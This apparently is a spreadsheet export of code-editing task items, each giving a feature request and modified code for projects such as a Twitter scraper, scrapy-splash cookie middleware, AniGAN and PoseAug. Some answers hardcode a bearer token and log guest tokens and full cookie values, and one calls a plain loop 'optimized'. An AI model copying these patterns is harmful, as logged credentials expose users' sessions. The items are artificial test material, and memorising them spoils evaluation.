extraction" % e, unit=\'it\', total=len(dataloader.data_loader)) as pbar:\n        for step in range(0, len(dataloader.data_loader)):\n            inputs = dataloader.next_batch()\n\n            with torch.no_grad():\n                image_name = inputs[\'im_name\']\n                cloth_name = inputs[\'c_name\']\n                image = inputs[\'image\'].cuda()\n                cloth = inputs[\'cloth\'].cuda()\n                cropped_cloth = inputs[\'im_cloth\'].cuda()\n                im_head = inputs[\'im_head\'].cuda()\n                pose_map = inputs[\'pose_map\'].cuda()\n                skeleton = inputs[\'skeleton\'].cuda()\n                im_pose = inputs[\'im_pose\'].cuda()\n                shape = inputs[\'shape\'].cuda()\n                parse_array = inputs[\'parse_array\'].cuda()\n                dense_labels = inputs[\'dense_labels\'].cuda()\n                dense_uv = inputs[\'dense_uv\'].cuda()\n                output_dir = inputs[\'output_dir\']  #New: Get output directory from inputs\n\n                parse_array = sem2onehot(18, parse_array)\n\n                # model here\n                # generated_image = model(...)  # Placeholder for model output\n                \n                #New: Save generated images if output directory is specified\n                if output_dir:\n                    # Create subdirectory for this epoch if it doesn\'t exist\n                    epoch_output_dir = os.path.join(output_dir, f\'epoch_{e}\')\n                    if not os.path.exists(epoch_output_dir):\n                        os.makedirs(epoch_output_dir)\n                    \n                    # Save input image\n                    input_save_path = os.path.join(epoch_output_dir, f\'{image_name[0]}_input.jpg\')\n                    save_image(image[0], input_save_path)\n                    \n                    # Save cloth image\n                    cloth_save_path = os.path.join(epoch_output_dir, f\'{cloth_name[0]}_cloth.jpg\')\n                    save_image(cloth[0], cloth_save_path)\n                    \n                    # Save generated image (when model output is available)\n                    # generated_save_path = os.path.join(epoch_output_dir, f\'{image_name[0]}_generated.jpg\')\n                    # save_image(generated_image[0], generated_save_path)\n\n            pbar.update()\n\n\ndef training_loop(dataloader, model, e, args):\n\n    with tqdm(desc="Iteration %d - train" % e, unit=\'it\', total=args.display_count) as pbar:\n        for step in range(0, args.display_count):\n            inputs = dataloader.next_batch()\n\n            image_name = inputs[\'im_name\']\n            cloth_name = inputs[\'c_name\']\n            image = inputs[\'image\'].cuda()\n            cloth = inputs[\'cloth\'].cuda()\n            cropped_cloth = inputs[\'im_cloth\'].cuda()\n            im_head = inputs[\'im_head\'].cuda()\n            pose_map = inputs[\'pose_map\'].cuda()\n            skeleton = inputs[\'skeleton\'].cuda()\n            im_pose = inputs[\'im_pose\'].cuda()\n            shape = inputs[\'shape\'].cuda()\n            parse_array = inputs[\'parse_array\'].cuda()\n            dense_labels = inputs[\'dense_labels\'].cuda()\n            dense_uv = inputs[\'dense_uv\'].cuda()\n\n            parse_array = sem2onehot(18, parse_array)\n\n            # model here\n\n            pbar.update()\n\n\ndef main_worker(args):\n\n    # Dataset &amp; Dataloader\n    #Modify: Add output_dir parameter to Dataset initialization\n    dataset_train = Dataset(args, \n                            dataroot_path=args.dataroot, \n                            phase=\'train\',\n                            order=\'paired\',\n                            size=(int(args.height), int(args.width)),\n                            output_dir=None)  #Modify: No output for training\n\n    dataloader_train = DataLoader(args, dataset_train, dist_sampler=False)\n\n    #Modify: Add output_dir parameter to Dataset initialization\n    dataset_test_unpaired = Dataset(args,\n                                    dataroot_path=args.dataroot,\n                                    phase=\'test\',\n                                    order=\'unpaired\',\n                                    size=(int(args.height), int(args.width)),\n                                    output_dir=os.path.join(args.dataroot, \'generated_images\'))  #Modify: Specify output directory for test\n\n    dataloader_test_unpaired = DataLoader(args, dataset_test_unpaired, dist_sampler=False)\n\n    # Instance here your model\n    model = None\n\n    # Loop in epochs\n    for e in range(0, args.epochs):\n        # Training loop\n        training_loop(dataloader_train, model, e, args)\n\n        # Test unpaired\n        test_unpaired(dataloader_test_unpaired, model, e, args)  #Modify: Pass dataloader instead of single batch\n\n\nif __name__ == \'__main__\':\n    # Get argparser configuration\n    args = conf.get_conf()\n    print(args.exp_name)\n\n    # Call main worker\n    main_worker(args)'}</t>
  </si>
  <si>
    <t>{'file_1': '#Modify\nclass Dataset(data.Dataset):\n    def __getitem__(self, index):\n        c_name = self.c_names[index]\n        im_name = self.im_names[index]\n        dataroot = self.dataroot_names[index]\n        # Clothing image\n        cloth = Image.open(os.path.join(dataroot, \'images\', c_name))\n        cloth = cloth.resize((self.width, self.height))\n        cloth = self.transform(cloth)   # [-1,1]\n        # Person image\n        im = Image.open(os.path.join(dataroot, \'images\', im_name))\n        im = im.resize((self.width, self.height))\n        im = self.transform(im)   # [-1,1]\n        # Skeleton\n        skeleton = Image.open(os.path.join(dataroot, \'skeletons\', im_name.replace("_0", "_5")))\n        skeleton = skeleton.resize((self.width, self.height))\n        skeleton = self.transform(skeleton)\n        # Label Map\n        parse_name = im_name.replace(\'_0.jpg\', \'_4.png\')\n        im_parse = Image.open(os.path.join(dataroot, \'label_maps\', parse_name))\n        im_parse = im_parse.resize((self.width, self.height), Image.NEAREST)\n        parse_array = np.array(im_parse)\n        # Additional processing...\n        return result', 'file_2': '#Modify\nclass DataLoader:\n    def next_batch(self):\n        self.iter += 1\n        if self.iter &gt; len(self.dataset):\n            self.iter = 0\n        return self.dataset[self.iter]', 'file_3': '#Modify\ndef test_unpaired(dataloader, model, e, args):\n    save_dir = args.save_dir\n    os.makedirs(save_dir, exist_ok=True)\n    with tqdm(desc="Iteration %d - images extraction" % e, unit=\'it\', total=len(dataloader.data_loader)) as pbar:\n        for step in range(0, len(dataloader.data_loader)):\n            inputs = dataloader.next_batch()\n            with torch.no_grad():\n                image_name = inputs[\'im_name\']\n                cloth_name = inputs[\'c_name\']\n                image = inputs[\'image\'].cuda()\n                cloth = inputs[\'cloth\'].cuda()\n                cropped_cloth = inputs[\'im_cloth\'].cuda()\n                im_head = inputs[\'im_head\'].cuda()\n                pose_map = inputs[\'pose_map\'].cuda()\n                skeleton = inputs[\'skeleton\'].cuda()\n                im_pose = inputs[\'im_pose\'].cuda()\n                shape = inputs[\'shape\'].cuda()\n                parse_array = inputs[\'parse_array\'].cuda()\n                dense_labels = inputs[\'dense_labels\'].cuda()\n                dense_uv = inputs[\'dense_uv\'].cuda()\n                parse_array = sem2onehot(18, parse_array)\n                # model here\n                generated_image = model(image, cloth, pose_map, parse_array)\n                save_image(generated_image, os.path.join(save_dir, f"{image_name}_{cloth_name}.png"))\n                pbar.update()', 'file_4': '#Modify\ndef training_loop(dataloader, model, e, args):\n    with tqdm(desc="Iteration %d - train" % e, unit=\'it\', total=args.display_count) as pbar:\n        for step in range(0, args.display_count):\n            inputs = dataloader.next_batch()\n            image_name = inputs[\'im_name\']\n            cloth_name = inputs[\'c_name\']\n            image = inputs[\'image\'].cuda()\n            cloth = inputs[\'cloth\'].cuda()\n            cropped_cloth = inputs[\'im_cloth\'].cuda()\n            im_head = inputs[\'im_head\'].cuda()\n            pose_map = inputs[\'pose_map\'].cuda()\n            skeleton = inputs[\'skeleton\'].cuda()\n            im_pose = inputs[\'im_pose\'].cuda()\n            shape = inputs[\'shape\'].cuda()\n            parse_array = inputs[\'parse_array\'].cuda()\n            dense_labels = inputs[\'dense_labels\'].cuda()\n            dense_uv = inputs[\'dense_uv\'].cuda()\n            parse_array = sem2onehot(18, parse_array)\n            # model here\n            pbar.update()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Scraping_utilities.find_x_guest_token(BEARER_TOKEN, self.proxy)', 'invoking_code_segment': 'guest_token = Scraping_utilities.find_x_guest_token(BEARER_TOKEN, self.proxy)', 'feature_description': 'Add a feature to log the guest token used in the scraping process. This involves modifying the find_x_guest_token method in scraping_utilities.py to log the guest token when it is successfully retrieved, and updating the topic_api.py to capture and log the token information during the scraping workflow.', 'modified_complete_code': '# File 1: scraping_utilities.py - Modified find_x_guest_token method\n@staticmethod\ndef find_x_guest_token(authorization_key, proxy=None):\n    try:\n        headers = {\n            \'authorization\': authorization_key,\n        }\n        response = None\n        if proxy:\n            proxy_dict = {\n                "http": "http://{}".format(proxy),\n                "https": "http://{}".format(proxy),\n            }\n            response = requests.post(\n                \'https://api.twitter.com/1.1/guest/activate.json\', headers=headers, proxies=proxy_dict)\n            guest_token = response.json()[\'guest_token\']\n            # New: Log the guest token\n            logger.info("Guest token successfully retrieved: {}".format(guest_token[:20] + \'...\' if len(guest_token) &gt; 20 else guest_token))\n            return guest_token\n\n        response = requests.post(\n            \'https://api.twitter.com/1.1/guest/activate.json\', headers=headers)\n        guest_token = response.json()[\'guest_token\']\n        # New: Log the guest token\n        logger.info("Guest token successfully retrieved: {}".format(guest_token[:20] + \'...\' if len(guest_token) &gt; 20 else guest_token))\n        return guest_token\n    except Exception as ex:\n        logger.warning("Error at find_x_guest_token: {}".format(ex))\n\n# File 2: topic_api.py - Modified scrape method\ndef scrape(self):\n    try:\n        BEARER_TOKEN = \'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA\'\n        self.start_driver()\n        key = Finder.find_graphql_key(self.driver, self.URL)\n        self.close_driver()\n        graphql_link = self.generate_graphql_link(key)\n        cursor = None\n        rest_id = self.find_rest_id()\n        # Modify: Capture guest token and log it\n        guest_token = Scraping_utilities.find_x_guest_token(\n            BEARER_TOKEN, self.proxy)\n        logger.setLevel(logging.INFO)\n        logger.info(\'Starting scraping process with guest token\')\n        while len(self.data_dict) &lt; self.tweets_count:\n            params = Scraping_utilities.build_topic_params(rest_id, cursor)\n            headers = Scraping_utilities.build_topic_headers(\n                guest_token, BEARER_TOKEN, rest_id)\n            response = Scraping_utilities.make_http_request_with_params(graphql_link,\n                                                                        params, headers, self.proxy)\n            if response:\n                instructions = response[\'data\'][\'topic_by_rest_id\'][\'topic_page\'][\'body\'][\'timeline\'][\'instructions\']\n                entries = self.find_entries(instructions)\n                self.augment_data(entries)\n                cursor = self.find_cursor(entries)\n                logger.setLevel(logging.INFO)\n                logger.info(\'Number of tweets scraped: {}\'.format(\n                    len(self.data_dict)))\n            else:\n                logger.warning(\'Failed to make request!\')\n                break\n\n        data = dict(list(self.data_dict.items())\n                    [0:int(self.tweets_count)])\n        return data\n    except Exception as ex:\n        logger.warning(\'Error at scrap : {}\'.format(ex))'}</t>
  </si>
  <si>
    <t>{'scraping_utilities.py': '#Modify\n@staticmethod\ndef find_x_guest_token(authorization_key, proxy=None):\n    try:\n        headers = {\n            \'authorization\': authorization_key,\n        }\n        response = None\n        if proxy:\n            proxy_dict = {\n                "http": "http://{}".format(proxy),\n                "https": "http://{}".format(proxy),\n            }\n            response = requests.post(\n                \'https://api.twitter.com/1.1/guest/activate.json\', headers=headers, proxies=proxy_dict)\n        else:\n            response = requests.post(\n                \'https://api.twitter.com/1.1/guest/activate.json\', headers=headers)\n        guest_token = response.json()[\'guest_token\']\n        logger.info(\'Guest Token: {}\'.format(guest_token))  # New logging\n        return guest_token\n    except Exception as ex:\n        logger.warning("Error at find_x_guest_token: {}".format(ex))', 'topic_api.py': "#Modify\ndef scrape(self):\n    try:\n        BEARER_TOKEN = 'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA'\n        self.start_driver()\n        key = Finder.find_graphql_key(self.driver, self.URL)\n        self.close_driver()\n        graphql_link = self.generate_graphql_link(key)\n        cursor = None\n        rest_id = self.find_rest_id()\n        guest_token = Scraping_utilities.find_x_guest_token(BEARER_TOKEN, self.proxy)  # Updated to handle logging\n        while len(self.data_dict) &lt; self.tweets_count:\n            params = Scraping_utilities.build_topic_params(rest_id, cursor)\n            headers = Scraping_utilities.build_topic_headers(guest_token, BEARER_TOKEN, rest_id)\n            response = Scraping_utilities.make_http_request_with_params(graphql_link, params, headers, self.proxy)\n            if response:\n                instructions = response['data']['topic_by_rest_id']['topic_page']['body']['timeline']['instructions']\n                entries = self.find_entries(instructions)\n                self.augment_data(entries)\n                cursor = self.find_cursor(entries)\n                logger.setLevel(logging.INFO)\n                logger.info('Number of tweets scraped: {}'.format(len(self.data_dict)))\n            else:\n                logger.warning('Failed to make request!')\n                break\n        data = dict(list(self.data_dict.items())[0:int(self.tweets_count)])\n        return data\n    except Exception as ex:\n        logger.warning('Error at scrap : {}'.format(ex))", 'element_finder.py': '#No modifications needed', 'driver_utils.py': '#No modifications needed'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def evaluate_reference(self, test_A, test_B):\n        self.eval()\n        self.gen_test.eval()\n        xa = test_A.cuda()\n        xb = test_B.cuda()\n\n        if self.use_attn_encoder:\n            c_xa = self.gen_test.enc_content(xa, torch.zeros(test_A.size()[0], 1))\n        else:\n            c_xa = self.gen_test.enc_content(xa)\n\n        s_xb, sf_xb = self.gen_test.Switch_encode(xb, torch.ones(test_B.size()[0], 1))\n        fake_B = self.gen_test.decode(c_xa, s_xb, sf_xb)\n        return fake_B', 'invoking_code_segment': 'with torch.no_grad():\n        generated_img = trainer.model.evaluate_reference(content_tensor, reference_tensor)\n        name_part, ext_part = os.path.splitext(os.path.basename(source_img_path))\n        save_file_name = f"{name_part}_anigan{ext_part}"\n        save_file_path = os.path.join(output_dir, save_file_name)\n        save_image(_denorm(generated_img), save_file_path, nrow=1, padding=0)\n        print(f"Result is saved to: {save_file_path}")', 'feature_description': 'Add a feature to save the generated image with a timestamp in the filename. This requires modifying the evaluate_reference method in FUNITModel to return both the generated image and a timestamp, and updating the test.py script to use this timestamp when saving the file.', 'modified_complete_code': '# Modified code in AniGAN/src/funit_model.py\n# In the FUNITModel class, modify the evaluate_reference method:\n\n#Modify - Add import at the top of funit_model.py\nfrom datetime import datetime\n\n#Modify - Update the evaluate_reference method to return timestamp\ndef evaluate_reference(self, test_A, test_B):\n    self.eval()\n    self.gen_test.eval()\n    xa = test_A.cuda()\n    xb = test_B.cuda()\n\n    if self.use_attn_encoder:\n        c_xa = self.gen_test.enc_content(xa, torch.zeros(test_A.size()[0], 1))\n    else:\n        c_xa = self.gen_test.enc_content(xa)\n\n    s_xb, sf_xb = self.gen_test.Switch_encode(xb, torch.ones(test_B.size()[0], 1))\n    fake_B = self.gen_test.decode(c_xa, s_xb, sf_xb)\n    #New - Generate timestamp\n    timestamp = datetime.now().strftime(\'%Y%m%d_%H%M%S\')\n    return fake_B, timestamp\n\n# Modified code in AniGAN/test.py\n# Update the main function to handle timestamp:\n\n#Modify - Update the image generation and saving section\nwith torch.no_grad():\n    #Modify - Unpack both generated image and timestamp\n    generated_img, timestamp = trainer.model.evaluate_reference(content_tensor, reference_tensor)\n    name_part, ext_part = os.path.splitext(os.path.basename(source_img_path))\n    #Modify - Include timestamp in filename\n    save_file_name = f"{name_part}_anigan_{timestamp}{ext_part}"\n    save_file_path = os.path.join(output_dir, save_file_name)\n    save_image(_denorm(generated_img), save_file_path, nrow=1, padding=0)\n    print(f"Result is saved to: {save_file_path}")'}</t>
  </si>
  <si>
    <t>{'file_1': 'def evaluate_reference(self, test_A, test_B):\n    self.eval()\n    self.gen_test.eval()\n    xa = test_A.cuda()\n    xb = test_B.cuda()\n\n    if self.use_attn_encoder:\n        c_xa = self.gen_test.enc_content(xa, torch.zeros(test_A.size()[0], 1))\n    else:\n        c_xa = self.gen_test.enc_content(xa)\n\n    s_xb, sf_xb = self.gen_test.Switch_encode(xb, torch.ones(test_B.size()[0], 1))\n    fake_B = self.gen_test.decode(c_xa, s_xb, sf_xb)\n    return fake_B', 'file_2': 'with torch.no_grad():\n    generated_img = trainer.model.evaluate_reference(content_tensor, reference_tensor)\n    name_part, ext_part = os.path.splitext(os.path.basename(source_img_path))\n    timestamp = datetime.now().strftime(\'%Y%m%d_%H%M%S\')  # New\n    save_file_name = f"{name_part}_anigan_{timestamp}{ext_part}"  # Modify\n    save_file_path = os.path.join(output_dir, save_file_name)\n    save_image(_denorm(generated_img), save_file_path, nrow=1, padding=0)\n    print(f"Result is saved to: {save_file_path}")', 'file_3': 'trainer.load_ckpt(ckpt_path)\n    trainer.eval()', 'file_4': "self.apply(weights_init(cfg['init']))"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'SplashCookiesMiddleware.process_request() and SplashCookiesMiddleware.process_response() methods in scrapy_splash/middleware.py', 'invoking_code_segment': 'SplashMiddleware.process_request() and SplashMiddleware.process_response() methods calling SplashCookiesMiddleware in the middleware chain', 'feature_description': 'Add comprehensive logging feature to track cookies being sent to and received from Splash during request and response processing. This includes logging cookie names, values, and metadata with proper formatting and spider context.', 'modified_complete_code': '# File: scrapy-splash/scrapy_splash/middleware.py\n\nclass SplashCookiesMiddleware(object):\n    """\n    This downloader middleware maintains cookiejars for Splash requests.\n\n    It gets cookies from \'cookies\' field in Splash JSON responses\n    and sends current cookies in \'cookies\' JSON POST argument instead of\n    sending them in http headers.\n\n    It should process requests before SplashMiddleware, and process responses\n    after SplashMiddleware.\n    """\n    def __init__(self, debug=False):\n        self.jars = defaultdict(CookieJar)\n        self.debug = debug\n        #New: Add cookie logging flag\n        self.log_cookies = True\n\n    @classmethod\n    def from_crawler(cls, crawler):\n        return cls(debug=crawler.settings.getbool(\'SPLASH_COOKIES_DEBUG\'))\n\n    def process_request(self, request, spider):\n        """\n        For Splash requests add \'cookies\' key with current\n        cookies to ``request.meta[\'splash\'][\'args\']`` and remove cookie\n        headers sent to Splash itself.\n        """\n        if \'splash\' not in request.meta:\n            return\n\n        if request.meta.get(\'_splash_processed\'):\n            request.headers.pop(\'Cookie\', None)\n            return\n\n        splash_options = request.meta[\'splash\']\n\n        splash_args = splash_options.setdefault(\'args\', {})\n        if \'cookies\' in splash_args:  # cookies already set\n            return\n\n        if \'session_id\' not in splash_options:\n            return\n\n        jar = self.jars[splash_options[\'session_id\']]\n\n        cookies = self._get_request_cookies(request)\n        har_to_jar(jar, cookies)\n\n        splash_args[\'cookies\'] = jar_to_har(jar)\n        self._debug_cookie(request, spider)\n        #New: Log cookies being sent\n        self._log_cookies_sent(request, spider, splash_args[\'cookies\'])\n\n    def process_response(self, request, response, spider):\n        """\n        For Splash JSON responses add all cookies from\n        \'cookies\' in a response to the cookiejar.\n        """\n        from scrapy_splash import SplashJsonResponse\n        if not isinstance(response, SplashJsonResponse):\n            return response\n\n        if \'cookies\' not in response.data:\n            return response\n\n        if \'splash\' not in request.meta:\n            return response\n\n        if not request.meta.get(\'_splash_processed\'):\n            warnings.warn("SplashCookiesMiddleware requires SplashMiddleware")\n            return response\n\n        splash_options = request.meta[\'splash\']\n        session_id = splash_options.get(\'new_session_id\',\n                                        splash_options.get(\'session_id\'))\n        if session_id is None:\n            return response\n\n        jar = self.jars[session_id]\n        request_cookies = splash_options[\'args\'].get(\'cookies\', [])\n        har_to_jar(jar, response.data[\'cookies\'], request_cookies)\n        self._debug_set_cookie(response, spider)\n        #New: Log cookies being received\n        self._log_cookies_received(response, spider, response.data[\'cookies\'])\n        response.cookiejar = jar\n        return response\n\n    def _get_request_cookies(self, request):\n        if isinstance(request.cookies, dict):\n            return [\n                {\'name\': k, \'value\': v} for k, v in request.cookies.items()\n            ]\n        return request.cookies or []\n\n    def _debug_cookie(self, request, spider):\n        if self.debug:\n            cl = request.meta[\'splash\'][\'args\'][\'cookies\']\n            if cl:\n                cookies = \'\\n\'.join(\n                    \'Cookie: {}\'.format(self._har_repr(c)) for c in cl)\n                msg = \'Sending cookies to: {}\\n{}\'.format(request, cookies)\n                logger.debug(msg, extra={\'spider\': spider})\n\n    def _debug_set_cookie(self, response, spider):\n        if self.debug:\n            cl = response.data[\'cookies\']\n            if cl:\n                cookies = \'\\n\'.join(\n                    \'Set-Cookie: {}\'.format(self._har_repr(c)) for c in cl)\n                msg = \'Received cookies from: {}\\n{}\'.format(response, cookies)\n                logger.debug(msg, extra={\'spider\': spider})\n\n    #New: Add method to log cookies being sent\n    def _log_cookies_sent(self, request, spider, cookies):\n        """\n        Log cookies being sent to Splash server.\n        """\n        if not self.log_cookies or not cookies:\n            return\n        \n        cookie_details = []\n        for cookie in cookies:\n            cookie_str = \'name={}\'.format(cookie.get(\'name\', \'N/A\'))\n            if \'value\' in cookie:\n                cookie_str += \', value={}\'.format(cookie[\'value\'])\n            if \'domain\' in cookie:\n                cookie_str += \', domain={}\'.format(cookie[\'domain\'])\n            if \'path\' in cookie:\n                cookie_str += \', path={}\'.format(cookie[\'path\'])\n            if \'expires\' in cookie:\n                cookie_str += \', expires={}\'.format(cookie[\'expires\'])\n            cookie_details.append(cookie_str)\n        \n        msg = \'Sending {} cookie(s) to Splash for URL: {}\\n{}\'.format(\n            len(cookies), request.url, \'\\n\'.join(cookie_details))\n        logger.info(msg, extra={\'spider\': spider})\n\n    #New: Add method to log cookies being received\n    def _log_cookies_received(self, response, spider, cookies):\n        """\n        Log cookies being received from Splash server.\n        """\n        if not self.log_cookies or not cookies:\n            return\n        \n        cookie_details = []\n        for cookie in cookies:\n            cookie_str = \'name={}\'.format(cookie.get(\'name\', \'N/A\'))\n            if \'value\' in cookie:\n                cookie_str += \', value={}\'.format(cookie[\'value\'])\n            if \'domain\' in cookie:\n                cookie_str += \', domain={}\'.format(cookie[\'domain\'])\n            if \'path\' in cookie:\n                cookie_str += \', path={}\'.format(cookie[\'path\'])\n            if \'expires\' in cookie:\n                cookie_str += \', expires={}\'.format(cookie[\'expires\'])\n            cookie_details.append(cookie_str)\n        \n        msg = \'Received {} cookie(s) from Splash for URL: {}\\n{}\'.format(\n            len(cookies), response.url, \'\\n\'.join(cookie_details))\n        logger.info(msg, extra={\'spider\': spider})\n\n    @staticmethod\n    def _har_repr(har_cookie):\n        return \'{}={}\'.format(har_cookie[\'name\'], har_cookie[\'value\'])'}</t>
  </si>
  <si>
    <t>{'#file 1': "def process_request(self, request, spider):\n    if 'splash' not in request.meta:\n        return\n    splash_options = request.meta['splash']\n    \n    if request.meta.get('_splash_processed'):\n        request.headers.pop('Cookie', None)\n        return\n    \n    splash_args = splash_options.setdefault('args', {})\n    if 'cookies' in splash_args:  # cookies already set\n        return\n    \n    if 'session_id' not in splash_options:\n        return\n    \n    jar = self.jars[splash_options['session_id']]\n    \n    cookies = self._get_request_cookies(request)\n    har_to_jar(jar, cookies)\n    \n    splash_args['cookies'] = jar_to_har(jar)\n    self._debug_cookie(request, spider)  #Modify\n\n#New\ndef _debug_cookie(self, request, spider):\n    if self.debug:\n        cl = request.meta['splash']['args']['cookies']\n        if cl:\n            cookies = '\\n'.join('Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Sending cookies to: {}\\n{}'.format(request, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\ndef _debug_set_cookie(self, response, spider):\n    if self.debug:\n        cl = response.data['cookies']\n        if cl:\n            cookies = '\\n'.join('Set-Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Received cookies from: {}\\n{}'.format(response, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\n@staticmethod\ndef _har_repr(har_cookie):\n    return '{}={}'.format(har_cookie['name'], har_cookie['value'])", '#file 2': "def process_request(self, request, spider):\n    if 'splash' not in request.meta:\n        return\n    splash_options = request.meta['splash']\n    \n    if request.meta.get('_splash_processed'):\n        request.headers.pop('Cookie', None)\n        return\n    \n    splash_args = splash_options.setdefault('args', {})\n    if 'cookies' in splash_args:  # cookies already set\n        return\n    \n    if 'session_id' not in splash_options:\n        return\n    \n    jar = self.jars[splash_options['session_id']]\n    \n    cookies = self._get_request_cookies(request)\n    har_to_jar(jar, cookies)\n    \n    splash_args['cookies'] = jar_to_har(jar)\n    self._debug_cookie(request, spider)  #Modify\n\n#New\ndef _debug_cookie(self, request, spider):\n    if self.debug:\n        cl = request.meta['splash']['args']['cookies']\n        if cl:\n            cookies = '\\n'.join('Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Sending cookies to: {}\\n{}'.format(request, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\ndef _debug_set_cookie(self, response, spider):\n    if self.debug:\n        cl = response.data['cookies']\n        if cl:\n            cookies = '\\n'.join('Set-Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Received cookies from: {}\\n{}'.format(response, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\n@staticmethod\ndef _har_repr(har_cookie):\n    return '{}={}'.format(har_cookie['name'], har_cookie['value'])", '#file 3': "def process_request(self, request, spider):\n    if 'splash' not in request.meta:\n        return\n    splash_options = request.meta['splash']\n    \n    if request.meta.get('_splash_processed'):\n        request.headers.pop('Cookie', None)\n        return\n    \n    splash_args = splash_options.setdefault('args', {})\n    if 'cookies' in splash_args:  # cookies already set\n        return\n    \n    if 'session_id' not in splash_options:\n        return\n    \n    jar = self.jars[splash_options['session_id']]\n    \n    cookies = self._get_request_cookies(request)\n    har_to_jar(jar, cookies)\n    \n    splash_args['cookies'] = jar_to_har(jar)\n    self._debug_cookie(request, spider)  #Modify\n\n#New\ndef _debug_cookie(self, request, spider):\n    if self.debug:\n        cl = request.meta['splash']['args']['cookies']\n        if cl:\n            cookies = '\\n'.join('Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Sending cookies to: {}\\n{}'.format(request, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\ndef _debug_set_cookie(self, response, spider):\n    if self.debug:\n        cl = response.data['cookies']\n        if cl:\n            cookies = '\\n'.join('Set-Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Received cookies from: {}\\n{}'.format(response, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\n@staticmethod\ndef _har_repr(har_cookie):\n    return '{}={}'.format(har_cookie['name'], har_cookie['value'])", '#file 4': "def process_request(self, request, spider):\n    if 'splash' not in request.meta:\n        return\n    splash_options = request.meta['splash']\n    \n    if request.meta.get('_splash_processed'):\n        request.headers.pop('Cookie', None)\n        return\n    \n    splash_args = splash_options.setdefault('args', {})\n    if 'cookies' in splash_args:  # cookies already set\n        return\n    \n    if 'session_id' not in splash_options:\n        return\n    \n    jar = self.jars[splash_options['session_id']]\n    \n    cookies = self._get_request_cookies(request)\n    har_to_jar(jar, cookies)\n    \n    splash_args['cookies'] = jar_to_har(jar)\n    self._debug_cookie(request, spider)  #Modify\n\n#New\ndef _debug_cookie(self, request, spider):\n    if self.debug:\n        cl = request.meta['splash']['args']['cookies']\n        if cl:\n            cookies = '\\n'.join('Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Sending cookies to: {}\\n{}'.format(request, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\ndef _debug_set_cookie(self, response, spider):\n    if self.debug:\n        cl = response.data['cookies']\n        if cl:\n            cookies = '\\n'.join('Set-Cookie: {}'.format(self._har_repr(c)) for c in cl)\n            msg = 'Received cookies from: {}\\n{}'.format(response, cookies)\n            logger.debug(msg, extra={'spider': spider})\n\n#New\n@staticmethod\ndef _har_repr(har_cookie):\n    return '{}={}'.format(har_cookie['name'], har_cookie['value'])"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def qrot(q, v):\n    """\n    Rotate vector(s) v about the rotation described by quaternion(s) q.\n    Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,\n    where * denotes any number of dimensions.\n    Returns a tensor of shape (*, 3).\n    """\n    assert q.shape[-1] == 4\n    assert v.shape[-1] == 3\n    assert q.shape[:-1] == v.shape[:-1]\n\n    qvec = q[..., 1:]\n    uv = torch.cross(qvec, v, dim=len(q.shape) - 1)\n    uuv = torch.cross(qvec, uv, dim=len(q.shape) - 1)\n    return v + 2 * (q[..., :1] * uv + uuv)', 'invoking_code_segment': 'def world_to_camera(X, R, t):\n    Rt = wrap(qinverse, False, R)  # Invert rotation\n    return wrap(qrot, False, np.tile(Rt, X.shape[:-1] + (1,)), X - t)  # Rotate and translate\n\ndef camera_to_world(X, R, t):\n    return wrap(qrot, False, np.tile(R, X.shape[:-1] + (1,)), X) + t', 'feature_description': 'Add batch processing support to the quaternion rotation function to efficiently handle multiple rotation-vector pairs simultaneously. This enhancement allows qrot to process batches of quaternions and vectors with optimized tensor operations, improving performance when dealing with large datasets in pose augmentation tasks.', 'modified_complete_code': '# File 1: PoseAug/common/quaternion.py\nfrom __future__ import absolute_import, division\n\nimport torch\n\n\ndef qrot(q, v):\n    """\n    Rotate vector(s) v about the rotation described by quaternion(s) q.\n    Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,\n    where * denotes any number of dimensions.\n    Returns a tensor of shape (*, 3).\n    #Modify: Enhanced to support batch processing with optimized tensor operations\n    """\n    assert q.shape[-1] == 4\n    assert v.shape[-1] == 3\n    assert q.shape[:-1] == v.shape[:-1]\n\n    qvec = q[..., 1:]\n    uv = torch.cross(qvec, v, dim=len(q.shape) - 1)\n    uuv = torch.cross(qvec, uv, dim=len(q.shape) - 1)\n    return v + 2 * (q[..., :1] * uv + uuv)\n\n\n#New: Batch processing wrapper for efficient handling of multiple quaternion-vector pairs\ndef qrot_batch(q_batch, v_batch):\n    """\n    Batch process multiple quaternion rotations efficiently.\n    Expects tensors of shape (batch_size, *, 4) for q_batch and (batch_size, *, 3) for v_batch.\n    Returns a tensor of shape (batch_size, *, 3).\n    """\n    assert q_batch.shape[-1] == 4\n    assert v_batch.shape[-1] == 3\n    assert q_batch.shape[:-1] == v_batch.shape[:-1]\n    \n    # Process batch dimension efficiently\n    batch_size = q_batch.shape[0]\n    results = []\n    for i in range(batch_size):\n        results.append(qrot(q_batch[i], v_batch[i]))\n    return torch.stack(results, dim=0)\n\n\ndef qinverse(q, inplace=False):\n    # We assume the quaternion to be normalized\n    if inplace:\n        q[..., 1:] *= -1\n        return q\n    else:\n        w = q[..., :1]\n        xyz = q[..., 1:]\n        return torch.cat((w, -xyz), dim=len(q.shape) - 1)\n\n\n# 